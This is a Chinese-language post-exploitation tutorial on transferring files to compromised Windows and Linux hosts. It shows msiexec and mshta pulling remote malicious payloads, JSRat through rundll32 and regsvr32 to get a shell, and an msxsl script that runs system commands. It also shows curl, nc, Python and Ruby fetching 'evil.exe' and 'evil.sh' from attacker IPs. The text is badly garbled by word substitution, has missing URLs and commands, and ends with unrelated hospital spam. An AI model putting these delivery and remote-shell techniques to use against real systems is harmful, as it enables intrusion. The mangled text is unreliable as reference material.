Windows&Linux文件通讯总结

0727>caspol.exe -s offC:WindowsMicrosoft.NETFramework64v2.0.50727>IEExec.exe msiexec

msiexec是windows内嵌的cmd也就是说特性，默许远程App特性，攻击者可以将msi副本MySpace到客户端端并执行者，比如说通过一个实例动手预览指明，首先我们通过msfvenom来特征一个恐吓的msi机制(这里以弹家用电脑为例，在实战经验里面可以根据只能展开改写)，并启动时一个比较有用HTTP维修服务：

再次在要能PS上通过msiexec来发挥作用远程App副本并执行者，该法则同样可以发挥作用无副本合上攻击：

msiexec /q /i mshta

mshta.exe是Google公司Windows操纵的系统相关机制，英文全名Microsoft HTML Application，可翻译为Google公司超文本标识语言学领域，主要用途执行者.hta副本，我们可以在本地构建hta副本，再次通过要能PS的mshta来远程App并执行者，例如在本地创建所列hta副本：

Demo

再次在远程要能PS上执行者所列请求发挥作用App执行者操纵，且无副本合上：

mshta

如果你想尽办法使得要能PSCS上线，那么也可以通过CS来特征hta副本：

再次在本地启动时一个HTTP维修服务：

再次在cmd下通过mshta来Apphta副本并列车运行，使其上线，且无副本合上：

mshta

CS里面出乎意料上线：

Rundll32

Rundll32.exe特性是以请求行的手段调用特性重定向机制库，的系统里面还有一个Rundll64.exe副本，它的意指是"执行者64位的DLL副本"， 其请求行下的主要用途法则为：Rundll32.exe DLLname,Functionname Arguments，其里面DLLname为只能执行者的DLL副本名，Functionname为前边只能执行者的DLL副本的指明引发出函数，Arguments为引发出函数的指明表达式。

这里我们主要用途JSRat来动手预览，JSRat是一个请求和遏制框架，仅为rundll32.exe和regsvr32.exe填充恐吓机制，项目电北京话号码：HTTPS://github.com/Hood3dRob1n/JSRat-Py.git

首先我们在本地列车运行JSRat窃听本地1234路由器：

./JSRat.py -i 192.168.174.131 -p 1234

再次通过会面client comand 相互连接客户端端执行者请求：

再次副本上述恐吓请求在要能PScmd下执行者：

再次出乎意料赶回一个但会北京话如下所示：

regsvr32

Regsvr32请求主要用途提出申请COM组件，是Windows的系统发放的用来向的系统提出申请图形客户端界面或者备用图形客户端界面的请求，以请求行手段列车运行，我们可以通过该请求来发挥作用远程副本App,和上面类似，这里也借助JSRat来发挥作用，首先我们在本地列车运行JSRat窃听本地1234路由器：

./JSRat.py -i 192.168.174.131 -p 1234

再次通过会面client comand 相互连接查阅客户端端执行者请求：

再次副本上述恐吓点在要能PScmd下执行者：

再次出乎意料赶回一个但会北京话

-------(以上为windows内嵌也就是说特性)------wget

Windows生存环境下，可MySpace免重新安装的可执行者机制wget.exe到要能工具，主要用途wgetApp副本。

wget.exeApp：

wget -O "evil.txt" curl

cURL是一个借助于URL语言学在请求行下工作的副本以太网也就是说特性，1997年首次发行，它默许副本MySpace和App，所以是综合以太网也就是说特性，但按传统观念，生活习惯称cURL为App也就是说特性，cURL还涵盖了主要用途机制开发的libcurl。当要能PS里面重新安装了curl时我们可以通过所列手段来发挥作用远程App副本到本地：

curl -o evil.exe netcat

当要能PS上重新安装了netcat是我们可以主要用途netcat来发挥作用副本App，当然这种场面在实战经验里面少之又少

首先，我们在本地主要用途nc起一个窃听，并传递我们想尽办法以太网的副本名称：

nc -lvp 4444 < evil.exe

再次在要能PS上App副本：

nc 192.168.174.131 4444>evil.exe python

当要能PS内重新安装了python时，我们可以在cmd里面主要用途python来发挥作用远程副本App：

>>> import urllib2>>> u = urllib2.urlopen('')>>> localfile = open('local_file.hta','w')>>> localfile.write(u.read())>>> localfile.close() WinScp

WinSCP是一个Windows生存环境下主要用途SSH的开源图形化SFTP客户端端。

#MySpacewinscp.exe /console /command "option batch continue" "option confirm off" "open sftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "put D:1.txt /tmp/" "exit" /log=log_file.txt#Appwinscp.exe /console /command "option batch continue" "option confirm off" "opensftp://bypass:abc123!@192.168.28.131:22" "option transfer binary" "get /tmp D: estapp""exit" /log=log_file.txt

主要用途winscp.exe 作为请求行表达式执行者远程MySpace/App操纵

MSXSL.EXE

msXSL.exe是Google公司主要用途请求行下处理事件XSL的一个机制，所以通过他，我们可以执行者JavaScript进而执行者的系统请求。

App电北京话号码为：

msxsl.exe 只能不感兴趣两个副本，XML及XSL副本，可以远程加载，指明手段如下：

msxsl

demo.xml:

Microsoft

exec.xsl:

function xml(nodelist) {var r = new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe");return nodelist.nextNode().xml;} Linuxftp（一般内嵌）

ftp在linux一般都内嵌，我们可以在路由器回传ftp展开交互，所以我们可以在本地围住FTP维修服务，再次在要能PS上通过路由器下的ftp展开远程相互连接来App副本

可以主要用途python3的pyftpdlib领域程序来围住ftp:

重新安装

pip install pyftpdlib

启动时

python -m pyftpdlib -p 2121

自始一个有用的FTP客户端端已经围住完毕成，会面 ftp://127.0.0.1:2121 亦可

（选项IP为 127.0.0.1 、路由器为 2121 ）

可选表达式:

-i 自行决定IP电北京话号码（选项为MA的IP电北京话号码）-p 自行决定路由器（选项为2121）-w 写越权（选项为null）-d 自行决定第一版 （选项为当前第一版）-u 自行决定客户端名列入-P 分设列入密码本

也可以主要用途IPOP启动时一个比较有用的FTP维修服务：

再次在要能PS上远程Appevil.exe副本：

TFTP

主要用途比如说的请求将客户端端本地副本MySpace到远程PS：

(从客户端端App远程PS的副本也类似，不再预览)

第一步，远程PS列车运行TFTP维修服务

apt-get install atftpd //重新安装tftp维修服务机制mkdir /tmp/backup //创建第一版chmod 777 /tmp/backup //改写越权sudo atftpd --daemon --port 69 /tmp/backup //启动时维修服务机制

第二步，Linux客户端端创建检验副本并主要用途tftp将副本MySpace到远程PS

echo "sent by tftp."> tftp.senttftp 192.168.43.237put tftp.sent tftp.get

第三步，远程PS查阅接收到的副本

sftp

sftp是Secure File Transfer Protocol的缩写，安全性副本传送协商。可以为以太网副本发放一种安全性的因特网的点对点法则。sftp 与 ftp 上有依然一样的语言学和特性。SFTP 为 ssh的其里面一大多。

名词：

列车运行SSH维修服务

systemctl start sshd

相互连接远程客户端端：

sftp username@ip

回车再次回传客户端端密码本亦可相互连接出乎意料。

将副本MySpace到客户端端上：

put [本地副本的电北京话号码] [客户端端上副本存储设备的前方]

将客户端端上的副本App到本地：

get [客户端端上副本存储设备的前方] [本地要存储设备的前方] ⭐scp

scp是secure copy的简写，主要用途在Linux下展开远程几张副本/第一版的请求。

和它类似的请求有cp，不过cp只是在MA展开几张不可跨客户端端，而且scp以太网是点对点的。可能但会稍微直接影响一下速度。当你客户端端SSD转化成null read only system时，用scp可以帮你把副本移出来。

另外，scp还非常不占到人力资源，不但会增加多少的系统损耗，在这一点上，rsync就远远远胜它了。虽然 rsync比scp但会快一点，但当小副本众多的情况下，rsync但会导致SSDI/O非常很高，而scp也就是说不直接影响的系统情况下主要用途。scp在跨工具副本的时候为了增加原始数据的安全性性，主要用途了ssh相互连接和点对点手段，如果工具彼此之间的设计了ssh免密码本列入，那在主要用途scp的时候密码本都只能回传。

重新安装：

yum install -y openssh-clients

主要用途：

从本地副本到远程

# 几张副本scp /home/test/test.txt root@192.168.0.2:/home/test/# 几张第一版scp -r /home/test/ root@192.168.0.2:/home/test/

从远程副本到本地

# 几张副本scp root@192.168.0.2:/home/test/test.txt /home/test/# 几张第一版scp -r root@192.168.0.2:/home/test/ v/home/test/rsync

rsync（remote synchronize）是一个远程原始数据实时也就是说特性，可通过 LAN/WAN 加速实时多台PS彼此之间的副本。也可以主要用途 rsync 实时本地SSD里面的各不相同第一版。

rsync 具有如下的也就是说优点：

可以反转留有整个第一版树和副本的系统可以很容易动手到依然原有副本的越权、时长、软硬重定向等须要特殊越权亦可重新安装最佳化的流程，副本以太网很高效率可以主要用途 rsh、ssh 手段来以太网副本，当然也可以通过必要的 socket 相互连接默许账号以太网，以便捷展开Facebook镜象

在主要用途 rsync 展开远程实时时，可以主要用途两种手段：远程 Shell 手段（决定主要用途 ssh，客户端检验由 ssh 主要职责）和 C/S 手段（即客户相互连接远程 rsync 客户端端，客户端检验由 rsync 客户端端主要职责）。无论本地实时第一版还是远程实时原始数据，首次列车运行时将但会把全部副本几张一次，之前再列车运行时将只几张有转变的副本（对于新副本）或副本的转变大多（对于原有副本）。

rsync 的请求格式为：

1）本地主要用途：rsync [OPTION...] SRC... [DEST]2）通过远程 Shell 主要用途：诺: rsync [OPTION...] [USER@]HOST:SRC... [DEST]引: rsync [OPTION...] SRC... [USER@]HOST:DEST3）会面 rsync 客户端端:诺: rsync [OPTION...] [USER@]HOST::SRC... [DEST]引: rsync [OPTION...] SRC... [USER@]HOST::DEST诺: rsync [OPTION...] rsync://[USER@]HOST[:PORT]/SRC... [DEST]引: rsync [OPTION...] SRC... rsync://[USER@]HOST[:PORT]/DEST

举例，主要用途比如说的请求将客户端端本地副本MySpace到远程PS：

echo "sent by rsync."> rsync.sentrsync -v -u -a -stat rsync.sent user1@192.168.43.237:/home/user1/rsync.get

远程PS查阅接收到的副本

rz、sz（lrzsz）

rz sz指示可以发挥作用linux和windows彼此之间的副本以太网，但立即在windows客户端端要重新安装Xshell或SecureCRT远程相互连接也就是说特性。

rz指示和sz指示是一对MySpace与App的指示。它们的文档原是lrzsz。

rz ： 主要用途linux与windows彼此之间的副本MySpacesz ： 主要用途linux与windows彼此之间的副本App

也就是说特性的重新安装:

yum install lrzsz -y

rz sz指示主要用途很有用，执行者rz 指示，远程相互连接也就是说特性但会弹出windows副本选项窗口，只要选项要MySpace的副本亦可

副本MySpace：

副本App：

⭐wget（内嵌）

wget 是一个从因特网上自动App副本的自由也就是说特性，默许通过 HTTP、HTTPS、FTP 三个最常见的 TCP/IP协商App，并可以主要用途HTTP 代理人。"wget" 这个名称由来 “World Wide Web” 与 “get” 的融合。当要能PS上有重新安装wget时，我们可以必要通过该领域机制来发挥作用远程副本App：

wget cURL

cURL是一个借助于URL语言学在请求行下工作的副本以太网也就是说特性，1997年首次发行，它默许副本MySpace和App，所以是综合以太网也就是说特性，但按传统观念，生活习惯称cURL为App也就是说特性，cURL还涵盖了主要用途机制开发的libcurl，当要能PS里面重新安装了curl时我们可以通过所列手段来发挥作用远程App副本到本地：

curl -o evil.sh netcat

首先，我们在本地主要用途nc起一个窃听，并传递我们想尽办法以太网的副本名称：

再次在要能PS上App副本：

Perl(一般内嵌)

Perl是以外很有名气的边缘化CGI语言学，linuxPS一般都内嵌perl生存环境，我们可以在路由器里面主要用途vim来编辑一个perlCGI，再次执行者perl来发挥作用远程副本App：

#!perl#!/usr/bin/perluse LWP::Simple;getstore("","evil.sh");

再次在路由器列车运行该perl副本亦可：

python

Python是以外很有名气的边缘化CGI语言学，当要能PS内重新安装了python时，我们可以在shell里面主要用途python来发挥作用远程副本App：

Type "help", "copyright", "credits" or "license" for more information.>>> import urllib2>>> u = urllib2.urlopen('')>>> localfile = open('local_file.sh','w')>>> localfile.write(u.read())>>> localfile.close()>>> Ruby

当要能PS内重新安装了Ruby时，我们可以在路由器主要用途vim来编辑一个RubyCGI，再次执行者Ruby来发挥作用远程副本App：

#!ruby#!/usr/bin/rubyrequire 'net/http'Net::HTTP.start("192.168.174.1") { |http|r = http.get("/evil.sh")open("save_location.sh", "wb") { |file|file.write(r.body)}}

出乎意料App副本到本地

PHP

当要能PS内重新安装了PHP时，我们可以在路由器主要用途vim来编辑一个PHPCGI，再次执行者PHP来发挥作用远程副本App：

出乎意料App远程副本到本地

中文翻译电北京话号码：

。

贵州生殖感染医院哪家好
重庆牛皮癣
河南白癜风医院哪里比较好
上海看妇科的专业医院
北京比较好的白癜风医院